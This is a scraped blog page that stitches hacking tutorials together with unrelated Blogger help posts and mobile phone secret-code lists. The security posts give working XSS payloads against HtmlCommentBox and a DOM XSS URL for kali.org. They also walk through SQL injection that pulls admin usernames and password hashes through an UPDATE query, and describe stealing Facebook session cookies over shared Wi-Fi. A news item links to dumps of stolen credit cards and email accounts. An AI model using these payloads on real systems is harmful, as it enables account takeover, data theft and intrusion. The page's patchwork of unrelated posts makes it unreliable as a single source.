Latest News

Introducing Evil In Your Website With Untrusted Third Party Scripts


This is a small case study, where my aim is to explain why you shouldn't use untrusted third party scripts on your website. Htmlcommentbox is a third part script that could be embedded into any webpage would bring a place where users can comment and interact with each, I feel it is poorly coded from both user's perspective and security perspective as it could introduce lots of spam in your website.

Let's talk about what else could it do else than introducing spam from security perspective. We [Me and Pepe Vila] have found two attack vectors with the HtmlCommentBox as Does not sanitise the user input's properly resulting in a stored xss and also a reflected xss, which obviously leaves wide variety of attack vectors from the attacker's perspective.

Stored XSS POC

The POC is very simple, Seems like that you can inject any thing as long as you don't close the tag:

Example:

<img src=x onerror=prompt(0);
<iframe/onload=prompt(0);
<svg/onload=prompt(0);

Let's see a demonstration of this on their live website where they themselves have hosted their htmlcommentbox making their website vulnerable to the stored XSS too.




The following page is where, users can request for additional features, as you can clearly see from the picture that it is using the htmlcommentbox. All, i did was to inject the following payload into the messagebox:

<img src=x onerror=prompt(0);


Second Issue - Reflected XSS

Well, this is not it, We have more for you, Implementing HTMLCommentBox also makes your website vulnerable to a non persistent xss.

Let's take a closer look at their script that users would implement on their page:

(function(){var s=document.createElement("script"),l=(""+window.location || hcb_user.PAGE),h="//www.htmlcommentbox.com";s.setAttribute("type","text/javascript");s.setAttribute("src",h+"/jread?page="+encodeURIComponent(l).replace("+","%2B")+"&opts=16862&num=10");if(typeof s!="undefined")document.getElementsByTagName("head")[0].appendChild(s);})()
If you closely look at the window.location portion, you would find that encodeURIComponent allows single quotes. If we just replace window.location with our alert statement, it would triggered under the script context, Hence making the website vulnerable to a xss. And the /jread?page='-prompt(1)-'&opt=x&num=y, this would be reflected under the page context.
So the POC would be as follows:

http://www.htmlcommentbox.com/?'-prompt(1)-'



Again, I am very thankful to @pepevila for pointing the second issue. 

The lesson to be learned is business that rely on or use third part scripts on their website, Should use well known scripts and make sure that they are not vulnerable to any attacks or atleast research if their haven't been any issues with them in past, because often times these third party scripts are responsible for the security breaches.

Take an example from this case study, Where using a third party script to host comments introduced High risk security vulnerabilities. Any one using this script on their websites are requested to immediately remove it.

Server Side Includes Vulnerability - SSI SCAN [TOOL]


SSI-Scan is a basic PoC tool that helps facilitate the discovery of SSI injection vulnerabilities, a fairly rare and underdocumented code injection vulnerability where Server Side Includes directives are executed without proper validation and may lead to a system compromise.

The tool at this stage, among its core functionality, supports basic server enumeration, web form enumeration, HTML comment and SSI directive discovery, extension checking, logging scans to a file and connection to host via HTTP proxy.
SSI-Scan discovers vulnerabilities so far by two ways: the default method of sending a hardcoded SSI payload encapsulated within an HTTP POST request, or the manual method of injecting username and password forms through their respective switches. In both cases, it looks for environment variable matches in the source. Before using this tool, it is recommended you learn more about SSI injection from the following resources:

https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection
http://capec.mitre.org/data/definitions/101.html

BASIC USAGE:

Starting the tool without any parameters will yield the list of
arguments and what they do.



Basic scanning is done via the -u option, e.g



If the default POST payload doesn't work (as in above), the tool will display a recommendation that you specifically target the forms with the --form_uname and --form_passwd switches. This will skip most of the
other enumeration functions.

For example:



The page has now clearly been proven to be injection positive. It is up to the user to manually research further into it, as SSI-Scan is not yet an exploitation tool, but likely will be in the near future.

ADVANCED USAGE:

The --logtofile <FILENAME_HERE> switch can be used to log scans to a file. Since it works by redirecting sys.stdout to a new variable, all output will be hidden during the duration of a scan, minus a "Log mode enabled" message.

The output can then be viewed from the specified file. The --proxy <IP:PORT> switch can be used to conduct a scan through an HTTP proxy (note that this can be substantially slower depending on the
proxy). A message displaying "Using proxy server at <IP address:port>"will appear on top.

--listvars is a placeholder switch that displays a partial list of SSI/CGI environment variables for informative purposes and potential future use.

Disk error occurred



Problem - A Disk read error occurred
                Press Ctrl+Alt+Del to restart

Reason - Mostly this problem occurred due to Hard Disk corrupted or Hard Disk cable problem

Solution and Recognize Problem - First of all assure that this problem is occurring exactly due to hard disk. You can insert your windows 7 OS and run this installation till "Install Window" if in this window your partitions are not showing than this is the hard disk problem and now you are assure this is hard disk problem now come to the solution
Kindly unplug all cable which connected to hard disk and plug it again in proper way. start your computer while starting your computer listen carefully if your hard disk is working fine then it will make little noise. if it is making noise than you are Done.

If you are still facing same problem than now its time to change your Hard disk.   

Like it ? Share it.

How to Download Youtube Video

1. Open this website and download java software 

2. Install this software

3. Open www.youtube.com and search your fav. video which one you want to download and copy the link from address bar

4. Now open www.keepvid.com and paste your youtube link which you copied from youtube address bar afterthat click on download button
     in this step you can face little pop-up problem but its not difficult to solve this just click on "Run this time" whenever it will pop - up and if a new window will appear in your browser regarding download video just check accept and run ( actualy this is not problem this is the security of microsoft an older version of java software can create backdoor on ur PC means can hack your pc in other thinking becoz u  downloaded a new fresh JAVA so may be it will not appear in ur browser depends on the situation)

5. After clicking on download button site will show you the option for your video download... select one of them by clicking on them 


6. DONE

Extra info -  There is a similar website like this  savevid.com process is same for downloading videos etc but i don't like to use this because there are a lot traffic and yea sometime it shows very rough videos automatically...

Click on Image for large view 

How I Hack Your Facebook By Stealing Your Cookies



We have already written several posts on hacking a facebook account and the article that sparked the most of the reader's interest was on "Hack A Facebook Account With ARP Poisoning". However, still as you can clearly see from the comments that there are lost of issues with the readers especially the beginners with replicating the process. So, I have recorded a video in which i will show you step by step how an attacker sitting on your local area network (Wifi) could steal your cookies and hack your facebook account. However, if you are sniffing on a LAN instead of WLAN, you would need to perform an ARP Spoofing attack.

Lan Sniffing - Core Concepts

  • If you are sniffing on a local area network (LAN), first of all you should make sure that your Network card is in the promiscuous mode. 
  • Next up you should know the difference between a hub and a switch based network, in case of a hub based network a normal packet sniffer would do the job, however in case of a switch based network we would need to launch an attack called "ARP Poisoning attack" or "Man in the Middle attack" in order to route the victims traffic through us.
Monitor a Facebook Account from any where in the world
I have recorded a video, in which, i will show you how an attacker can sniff/capture http cookies for facebook, the two cookies that are important to us are c_user and xs, because they are facebook's authentication cookies. 


Kali Linux DOM Based XSS Writeup


Recently, I have been on a mission to find XSS in popular security training websites, Since these are the ones who care about their security the most. I have been successful in finding in almost all of them i have tried up to date, This one was a bit interesting to i thought to write a post on it, Basically it was not a reflected/stored xss, however it was a DOM based XSS, similar to the one i found in Microsoft. Unlike others, this particular XSS occurs in client side javascript.

In order to provide features to the users lots of webmasters/Vendors are moving their code towards client side, the data is embedded in the DOM and before it's reflected back to the user it is not filtered out, which results in a DOM based XSS. The main cause of this vulnerabilities are dangerous Sinks. DOM based XSS wiki is a good source where you would find dangerous sources and sinks.

On checking out the source of kali.org, i immediately found out that i was running wordpress version 3.5.1, The version is the latest version of the wordpress and has no known public vulnerabilities till date, therefore i moved towards testing plugins.


I tested couple of plugins, however did not find any one of them vulnerable, by analyzing the source more deeply i found a pretty interesting plugin "WP-Pretty Photo" which caught my interest. Which is a jquery based lightbox for wordpress platform.


Next i performed a detailed analysis on the prettyphoto.js file, hunting for DOM based XSS. After my analysis i managed to construct a valid payload to trigger the DOM based XSS. You can find my detailed analysis about the prettyphoto.js DOM xss vulnerability here.




POC:

http://www.kali.org/#!%22%3E%3Cimg%20src=1%20onerror=prompt%280%29;%3E//

Some debugging with chrome JS console, led me to the line 79 of the jquery.prettyPhoto.js, the line of code which was responsible for the cause of the DOM Based XSS.

http://www.kali.org/wp-content/themes/persuasion/lib/scripts/prettyphoto/js/jquery.prettyPhoto.js?ver=2.1



It was also obvious from the code that it required us ! sign to successfully execute the javascript.


The input inside the hashrel was not filtered out before it was being displayed to the user, which resulted in the DOM Based XSS.

The Fix

The following url discusses, about the fix:

https://github.com/Duncaen/prettyphoto/commit/3ef0ddfefebbcc6bbe9245f9cea87e26838e9bbc

If, this was not enough for you, then listen to this, Offensive-security team was very awesome in a sense, that they gave me a free voucher for their famous certification PWB 3.0.

 
I was really surprised to see that Dominator was not detecting it which is the only good tool for finding DOM Based XSS leaving IBM javascript scan apart, in past i have tried dominator against various websites suffering from DOM Based XSS and have found that, at some spots it's very good and at some spots it needs much improvement. Here is the screenshot:




I would like that every one would be act the same way i did and responsibly disclose every issue you find.

How Was 1337day.com Hacked?

Today, in the morning when i browsed to 1337day.com (The famous exploit buying/selling database), I was shocked to see 1337day defaced by famous turkish hacker group named "Turkguvenligi", In past Turkguvenligi has been responsible for defacements of lots of famous websites. Here is what appeared when i came across 1337day.com


On their defacement page, they told that they had asked 1337day to ban a fake user with author id =5819 but they refused to do so, As i browsed to http://www.1337day.com/author/5819, i website was first appeared to be inaccessible, later it showed the following message:


However, i used their mirror site 1337day.org to access the author link, Here is the screenshot:


By looking at the author name "Agd_Scorp", i understood the whole point of the dispute, Agd_Scorp is a well known hacker and founding member of "Turkguvenligi", He is responsible for lots of high profile defacements, If you take a look at his Zone-h record, it's pretty impressive, he has history of hacking into domain registrars.

It appears to me that some known was submitting exploits with the name of Agd_Scorp, They asked 1337day team to remove it, however they refused to remove it. Therefore they defaced their website.

How was 1337day.com hacked?

There have been issues in the past where 1337day, injectors etc and their mirror websites were hacked, but in all of those cases, their servers were never compromised, it was their domain registrar Moniker.com, which got compromised by the attackers.

The attackers, compromised moniker.com and changed their dns servers to their own dns servers, a story matching Google Pakistan hack, The 1337day team later confirmed on their facebook that their domain registrar was the victim of their attack not their DNS servers.

They have also asked webmasters not to invent stories that their server was hacked. They say it's impossible, I don't agree with them on this point. Even most secure systems can be compromised.

On performing a WHOIS lookup, I came to know that they have actually switched their hosting account from Moniker.com to hostgator.com


I have confirmed with hostgator that the dns servers for websitewelcome belong to them. We, will update you as soon as we have more information. 

Karbonn Mobile secret Codes

We are sharing some  secret code of Karbonn Mobile phone.

**#0000# with [Press Green or Dial Key] =   Set Default Language

**#0007# with [Press Green or Dial Key] =  Set Russian Language

**#0033# with [Press Green or Dial Key] =   Set French Language

**#0034# with [Press Green or Dial Key] =  Set Spanish Language

**#0039# with [Press Green or Dial Key] =   Set Italian Language.

**#0044# with [Press Green or Dial Key] =   Set English Language.

**#0049# with [Press Green or Dial Key] =   Set German Language.

**#0066# with [Press Green or Dial Key]  =  Set Thai  Language .

*#987*99#  =  Restore Factory Settings

*#06#   = It Shows IMEI Number

*#110*01#    = It Shows Engineering Mode

*#987#    = It Shows factory Mode

 *#900#    = It Checks Software Version

*#800#   = It Shows Software Version

*#369#    =  It Changes LCD Contrast

Like it ? Share it.

Comment Moderation In Blogger Blogs, Using Google+ Comments

With more Blogger blogs being updated to use Google+ Comments, we're seeing a few questions in Blogger Help Forum: How Do I?, about comment moderation.
How do I moderate comments, with Google+ Comments enabled on my blog?

This is a question for which there is no easy answer - and this is one of the least appreciated feature limitations of Google+ Comments.

Native Blogger commenting allowed the option to moderate comments before or after they were published.

Google+ Comments, for Blogger blogs, provides no ability to moderate before publishing. All comments must be moderated after they are published. Moderation now simply consists of the ability to declare a comment as abusive - and this ability is shared equally by all users of Google+, who are in the right Circle to read and mark any comment.

With native Blogger Commenting, you (the blog administrator / owner) could moderate comments (before or after publishing), using either email, or the dashboard Comments section. With Google+ Comments, you have no such ability - and the dashboard won't even have a Comments section, listing comments made against the blog. You can view comments made - when you are able to view them - on a post by post basis, under each post.

As the blog owner, you do not have control over all comments, published against your blog. If you allow comments using Google+, anybody who is in one of your Circles can publish a comment against your blog. If you Share a blog post to the Public - or if someone else Shares a post from your blog to the Public - and a third person comments, you may not even see the comment made, against your blog.

You cannot see comments published by people who are not in your Circles, unless the comments are posted Publicly - even if the comments are published against your blog.

For these reasons, this blog remains with Blogger Commenting.

Blogger Blogs Redirecting To "opromo . com"

This week, we're seeing a new stream of problem reports, from blog owners whose blogs are, once again, mysteriously redirecting their readers to unknown destinations.
When I open my blog, it automatically directs to another search engine display.

This appears to be yet one more gadget, willingly installed by many Blogger blog owners, which is now redirecting uninterested viewers. The target of the redirection, this week, is a parked domain website (ie, "search engine display") - for a product which was apparently installed, willingly, by the blog owners.

It appears that the "opromo . com" free visitor meter is the latest victim of expiring domain registrations.

Overview for opromo.com

Registrar Info
Name PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Whois Server whois.PublicDomainRegistry.com
Referral URL http://www.PublicDomainRegistry.com
Status clientTransferProhibited

Important Dates
Expires On May 09, 2013
Registered On May 09, 2006
Updated On May 09, 2013
People who earlier installed the Opromo free visitor meter will need to uninstall it, as it's apparently no longer operational. Reliable replacements would be SiteMeter and StatCounter - as well as Google Analytics.

From what we've seen, identification and removal of the problem code seems to be straightforward - just access the dashboard "Layout" menu wizard, find the gadget identified, and remove it.

As always, you are advised to clear cache and restart the browser, after removal and before testing for success. If the gadget makes your dashboard redirect, before you can remove the redirecting code, use a well protected browser, like Firefox with NoScript, to block the redirection.

>> Top

Empty Or New Blogs Can Be Classified As Spam Hosts

We're seeing a few recent reports, in Blogger Help Forum: Something Is Broken, from owners of empty and / or new blogs, about spurious spam classification.

Very few owners of empty or new Blogger blogs understand why their blogs should be classified as possible spam hosts, by the Blogger anti-spam processes. Most blog owners seem to think that only blog content is considered, in spam classification.

Spam classification considers many characteristics of a Blogger blog, in classifying any blog as a possible spam host.

Blog post content is an obvious - but not the only - factor in spam classification. Given previously observed behaviour of spammers, many characteristics of blogs, besides simply the extracted and analysed content, are used in classifying possible spam blogs. Using fuzzy spam classification techniques, one might also consider
  • Accessories and decorations, on the blog.
  • Addresses used, in setting up multiple blogs.
  • Overall behaviour in Google, by the owner.
  • Past posting habits of the owner.
  • Previous classification of similar blogs.

Some spammers obscure their activity, with gratuitous Google activity.

Some spammers are active in multiple Google activities and features. It's possible that some spammers even try to make their spam in Blogger harder to detect, by spreading their activity across other Google services - even when non abusive in other Google services.

Some spammers may not realise that activity in other Google areas can be tracked, and included by Blogger spam classifications processes.

Blog publishers, enjoying similar activities, may be spuriously classified.

Blog owners who use one or more techniques involved in setting up and maintaining spam blog farms may be classified as spammers - and their blogs then classified as possible spam hosts.

The term "blog owner" must itself be considered fuzzily, as some spam blog farms contain blogs owned by multiple Blogger accounts and profiles. Some Blogger accounts, similar to known spammer accounts - even with no blogs owned, or with empty blogs published - may then appear as possible spam hosts.

Empty blogs may still provide clues, which suggest spammy purpose.

Empty blogs, that appear similar to blogs in known spam farms, may themselves be classified as possible spam hosts. Various details such as blog name, blog design, and use of various blog accessories and features, can make a blog appear similar to known spam blogs - with no other content.

As long as spammers exist, some Blogger blogs will be spuriously classified.

Given the need for Google to reduce the volume of spam blogs, fuzzy spam classification might use any of the above details, in classifying any empty or new blog as a possible spam blog. This will, unfortunately, lead to spurious spam blog detection.

The possibility of spurious classification cannot prevent classification, in general.

Given the ability of spammers to publish multiple blogs in the Blogger name space, classifying empty and new blogs is necessary, in making it possible for Google to keep up with spammy activity. This technique enables publishers of genuine blogs to have their blogs viewed as righteous Internet content - not as one more blog, in a sea of spam.

Lava Mobile Secret Codes

We are sharing some Lava Mobile Secret codes which really very useful for users.

*#110*01#   Engineering Mode

*#987#         factory Mode

*#987*99#  Restore Factory Settings

*#900#       Software Version

 *#800#       Software Version

*#369#     Change LCD Contrast:


To Enable COM Port: *#110*01# -> Device -> Set UART -> PS Config -> UART1/115200


Like it ? Share it.

Anonymous Hackers Cause Significant Damage To Banking And Government Agencies



A collective of hacker groups planed to attack the websites of major government agencies and banks on May 7 to protest American foreign policy.

For weeks, the groups, which include Anonymous, have used social media to publicize their planned operation, dubbed "#OpUSA."


Experts from USA(to cover up things) say that the attack was not well-planned and focused. On the other hand, twitter is full of #OpUSA tweets which tells us a different story. The hacker groups have compromised a large number of targets which as either owned by US government or its residents.

AnonGhost made a significant contribution to #OpUSA by taking down a large number of websites, emails, credit cards, etc. According to their pastebin post, hackers claim to hack-

- More than 700 websites (http://pastebin.com/zftTrrrh)
- More than 10k American credit cards(http://pastebin.com/D4QCynHC)
- 1 lac email accounts which belong to US residents (http://www45.zippyshare.com/v/58998013/file.html) 4. - More than 5000 facebook accounts(http://pastebin.com/NRvmnYFe)
- More than 12k email accounts of USA (http://www11.zippyshare.com/v/39103082/file.html)

The complete paste can be seen here(http://pastebin.com/RSqKCd1N).

The list of hacked sites mostly include high profile government websites from Australia, Ministry of environment Dominica, government of Argentina, Philippines, NGOs,  universities and other educational institutions from Thailand  Brazil, Russia, Israel, USA, Canada, UK, Romania, and Italy.

Most of the sites seem to be recovered but some of them are still now defaced, down or under maintenance.

We managed to ask the leader of AnonOps "Mauritania Attacker", also responsible for lots of high profile defacements, the purpose and the cause of the #OPUSA.

"I attack USA because they think that muslims are terrorist but the reality is that they themselves are the biggest terrorist and they declared war Against Islam and me as a Muslim i will stand against them even if i die " Mauritania Attacker said.

Mauritania Attacker is the leader of AnonOPS, He played a major role inside #OPISRAEL, along with it he is also responsible for other high profile attacks on lots of other organizations.

Note: RHA has no association with any of the hacktivists. 

About The Author

Major Part of this article was contributed by a security researcher Deepanker Arora. Recently, He contributed an article on "Hacking Windows Servers".

Aircel USSD Codes List

We are sharing with you some USSD number for Aircel. These Codes are very useful.

Aircel Customer Care Number – 121 or 123
Check Your Aircel Number – dial *131# or *1#
Aircel Main Balance Check – *125# or BAL to 121
Aircel Local Mobile Calls Balance – *111*4#
How to Get Internet Setting – PI to 121 or ALL to 121
How to Check GPRS Balance – *126*4# or *126*1# or *301#
Aircel 3G Activation Process- START 3G to 121
Switch Off The Mobile Phone – *21*904#
Aircel DND Service Activation Code – DND to 1909
Rate Cutter – 1215 or *122#
e-Recharge – *124*(your aircel number)#
Value Added Service Of Aircel – 1214
Check IMIS no – *222# or *2# or *214#
Free Sms Message Center No – +919808932698 or +91905063222 or +919050563221
Aircel Balance Transfer – *122*666#

Like it ? Share it.

SQL Injection With Update Query


                             SQL1.bmp
We have wrote couple of articles discussing various techniques and attack vectors for SQL Injection, We have already discussed Basic SQL Injection With Union Based, Blind SQL Injection, Time Based SQL Injection and also discussed common problems and their solutions related to SQL Injection. However, this time Daniel Max a regular reader of RHA will discuss about exploiting SQL Injection with Update Query.

Most of the tutorials, You see on the web usually explains to use the SELECT method in order to retrieve stuff from the database, But what if we wanted to update some thing that is already present in the database, For example a MD5 hash, that we are not able to crack, In order to gain access to the admin panel, We would simply run a update query and it will automatically update the password. We recommend you to atleast read little bit about MYSQL from w3schools.com, before proceeding with this tutorial as this tutorial is not for complete beginners.

Requirements
So, Below is a screenshot of the form which we want to update, What we want to update is the Email address with our SQL Injection.


Vulnerable parameter is "E-mail format: " value.We would use Tamper data to intercept and change the values.

Here is a screenshot:



After we click ok we get an error the following error:


First we want to find the exact database version, but what would be the easiest way.

We can set value for other parameters, MySQL will let us do that as long as that parameter is one of UPDATE query parameters. We will use "fname" , which is string value. Database query output will be shown inside "First name" input box (where it says MaXoNe).

Screenshot of version query:


Screenshot of the rendered content with database answer:





Now that we know how to create our query, lets get the tables.

Full query: html' , fname = (select group_concat(table_name) from information_schema.tables where table_schema = database()) , phone = '

Tables Query:


Screenshot of the rendered content with database answer:




Three tables, strange !? Lets check that again.We use count.

Full query: html' , fname = (select count(table_name) from information_schema.tables where table_schema = database()) , phone = '

Screenshot of get tables count query:



Screenshot of the rendered content with database answer:




Now is time for Burp intruder.Set browser to use 127.0.0.1 and 8080 for all URLs.
We use Burp Suite intruder with 'Attack type' "Sniper" and 'Payload type' "Numbers"

Full query: html' , fname = (select concat(table_name) from information_schema.tables where table_schema = database() limit 0,1) , phone = '

Screenshot of burp settings:



Thats it. And now you just get columns the same way with Burp Suite.

Full query: html' , fname = (select concat(column_name) from information_schema.columns where table_name = 0x61646d696e73 limit n,1) , phone = '

Just increment n with Burp Suite.

Values :

Full query: html' , fname = (select concat(user,0x3a,pass) from admins limit n,1) , phone = '

Just increment n with Burp Suite.

That's it , simple and yet effective . I used this because , waf blocked -- and --+ so I wasn't able to close and comment out query.

About The Author

This article has been written by Daniel Max, He is a security researcher from Bosnia, He is willing to actively contribute to RHA. 

The Google+ Comments Feature Was Recently Updated - And Is Now Broken

We are seeing an abrupt flood of reports from Blogger blog owners who have accepted Google+ Comments, in their blogs.

It appears that Blogger has fixed the observed problem with the Comment Count not displaying - and has possibly at the same time, broken Google+ Comments, in general.

Blog owners are reporting that comments are simply not visible - even with the Comment Count now showing a non zero value. My test blog is now showing this problem - though it did not, before I updated the post template.

We have a new Rollup Discussion, where everybody observing this problem is invited to provide some diagnostic details.

(Update 2013/05/02 23:00): The problem appears to be resolved.

>> Top

HTC Mobile Phone Secret code


Check your Mobile phone's Information =  *#*#7780#*#*

Check your Mobile Battery Information = *#*#7780#*#*

Check your Battery history Information = *#*#7780#*#*

Check or test  your Mobile phone Bluetooth  = *#*#232331#*#*

Check your Mobile phone Bluetooth device address = *#*#232337#*#

Check your Mobile phone's LCD Information use = *#*#0*#*#*

Check your Mobile phone's RAM Information = *#*#3264#*#*

Check your Mobile phone's  Screen version Information = *#*#2663#*#*

Check your Mobile phone's  Touch screen test Information = *#*#2664#*#*

Check your Mobile phone's proximity sensor test: Information  = *#*#0588#*#*

Check your Mobile phone's Melody Test Information = *#*#0673#*#* OR *#*#0289#*#*

Check your Mobile phone's WiFi MAC address Information = *#*#232338#*#*

Check your Mobile phone's Test GPRS Information =   *#*#1472365#*#*

Check your Mobile phone's Test Another GPRS Information = *#*#1575#*#*

Check your Mobile phone's PDA, Phone, H/W, RFCallDate Information = *#*#4986*2650468#*#*

Check your Mobile phone's PDA and Phone Information = *#*#1234#*#*

Check your Mobile phone's FTA SW Version Information = *#*#1111#*#*

Check your Mobile phone's FTA HW Version  FTA HW Version: *#*#2222#*#*

Check your Mobile phone's full PDA, Phone, CSC, Build Time, Changelist number Information
*#*#44336#*#*

Check your Mobile phone's Packet Loopback Information =  *#*#0283#*#*

Check your Mobile phone's test Vibration  BackLight Information =  *#*#0842#*#*

Check your Mobile phone's usage statistics Information =  *#*#7780#*#* 

Like it ? Share it.

Lemon Mobile Secret codes



*#987*99#  Restore factory settings. (This code is used to restore your mobile phone without your lock code, means using this code you can unlock your phone)

1122, 1234, 5678 default user code  (These usually used in any phone for default codes.)

*#110*01#  Engineer mode (If you want enter in Engineer mode than use it.)

Enable COM port: *#110*01# -> Device -> Set UART -> PS Config -> UART1/115200

*#369# LCD contrast  (You can set your  Phone's LCD contrast.)

 *#800# Software version, Using this you can see software version

 *#900# Software version

*#0000# Set default language 

Like it ? Share it.

Renewing Your Custom Domain Registration

Some Blogger blog owners, having experienced the anxiety of custom domain setup, intend to carefully maintain their domain registration.

We see a few queries, in Blogger Help Forum: How Do I?, about domain registration renewal.
How do I make sure my registration gets renewed?
or
How do I renew registration before it expires?
or, possibly
My blog now displays a search page! Have I been hacked?

Some registration issues will depend upon how the domain registration was originally purchased.

Domains purchased directly from a registrar - whether using eNom, GoDaddy, or a third party registrar, will have to be renewed directly from the registrar. It's not possible to migrate a direct purchase to Blogger / Google registration for payment, any more than to use the Blogger / Google automatic DNS setup. Once you purchase domain registration from a registrar, you are on your own.

If you used Blogger "Buy a domain", Google Apps, or Google Wallet, to purchase the domain registration, you should get email reminders when registration is expiring. However, this will depend upon whether your Blogger / Google account, under which you purchased the registration, uses an active and accessible email address.

If you choose to anonymise yourself by using a bogus or inactive email address for your Blogger or Google activities, don't expect to get email reminding you, or allowing you to renew domain registration.

The most reliable way to assure the domain remains registered is to use domain auto renewal. You can check your auto renewal settings using the Google Apps administrator account, for the domain (now called the "Admin Console"). Be aware of the oddities of the Google One Login wizard, and Google Apps, when logging in.

For domains purchased before December 2012, you'll use email from Google Apps, or an entry in your Google Wallet log, to retrieve the token to setup your Google Apps account. For domains purchased after November 2012, you will have only a limited access Google Apps account, which you should reset the password, to access.

If you intend to use domain auto renewal, make sure that the bank account (credit, or debit) is active, and currently paid. If your bank rejects the payment, you should get a notice - but again, this will come reliably when the email account associated with the domain is active and accessible by you.

Procedures for renewal after expiration are different - and may cost substantially more than the normal yearly fee.

The best renewal experiences, of course, start with advance planning.

>> Top

Micromax Mobile Secret Codes

Restore Factory Settings *#987*99#
Check Software Version *#900#
Use For Engineering Mode  *#110*01#
Use For Factory Setting  *#987#
Use Change LCD Contrast:  *#369#


Like it ? Share it.

Contact Us

24x7 online , we happy to answer you
tamilcypc@gmail.com

Disclaimer

This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.



Featured Post

Custom Domains And HTTPS Redirection Code